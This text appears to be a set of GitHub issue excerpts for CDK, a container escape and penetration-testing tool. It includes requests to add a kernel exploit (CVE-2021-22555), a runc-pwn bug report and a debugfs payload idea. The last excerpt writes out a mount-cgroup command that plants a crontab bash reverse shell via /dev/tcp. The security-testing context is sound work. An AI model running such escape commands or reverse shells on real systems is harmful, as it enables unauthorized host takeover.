CDK
📦 Make security testing of K8s, Docker, and Containerd easier.
ref. - https://mp.weixin.qq.com/s/yfBgIr393WzcyKDCz-74WA
Requirement: * colorful * uniform interface * do not specify \t \n repeatedly in code * especially, in Evaluate module
* Support Self Update * Maybe we can use https://github.com/rhysd/go-github-selfupdate
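The pull is judged to have failed, but the printed response actually already contains the retrieved information; it should be judged successful and written to the file. This is the case for all three: secret, psp, and configmap. This part of the code may need to be modified.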
From: @nikitastupin in #20 The reason why I didn't implement the actual `CAP_SYS_MODULE` escape in CDK is because each kernel version and architecture combination requires a kernel module built specifically for it....
Could CVE-2021-22555 be added to CDK, with support for CentOS kernel versions, for example: Linux 3.10.0-1160.25.1.el7.x86_64 #1 SMP Wed Apr 28 21:49:45 UTC 2021 x86_64 GNU/Linux [cve-2021-22555/exploit.c](https://github.com/google/security-research/blob/master/pocs/linux/cve-2021-22555/exploit.c) [A kernel network vulnerability explained in detail | Container escape](https://mp.weixin.qq.com/s/zFDNafu6ArKKwmlkwf-A6w) [CVE-2021-22555](https://github.com/duowen1/Container-escape-exps/blob/main/CVE-2021-22555/readme.md) [CVE-2021-22555: privilege escalation analysis of a 2-byte heap overflow write-zero vulnerability](https://www.anquanke.com/post/id/254027)
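Is this approach feasible? Use stat in debugfs to read file information and, based on the information in that output, write the payload into certain files. There are also many ways to make the kernel invoke such a replaced file, for example by using kernel core dumps and the like. I'm just a newbie and this is as far as I've thought; I'd appreciate corrections from the experts.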
A document explaining the differences between the release binaries is needed (memo; to be written soon). > In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in...
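## Problem description When running the runc-pwn module, after it reports `cannot find RunC process inside container, exit.`, it exits immediately and shows Finished without anything having happened. The if check on line 87 returns from the function directly, so the target container has already stopped watching for the pid before the host has had a chance to run the exec command. When the host first creates the container, runc exits as soon as it finishes executing, so runc's pid cannot be obtained. > https://github.com/cdk-team/CDK/blob/b0ca845156bd9ef8c2d2ce13ab33699f04b9047d/pkg/exploit/docker_runc.go#L87-L90 ## Additional Information 1. Output of running `cdk evaluate --full` ``` $ ./cdk evaluate --full CDK (Container DucK) CDK Version(GitCommit):...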
```bash root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab" 2023/10/17 04:25:59 current cgroup for exploit: memory 2023/10/17 04:25:59...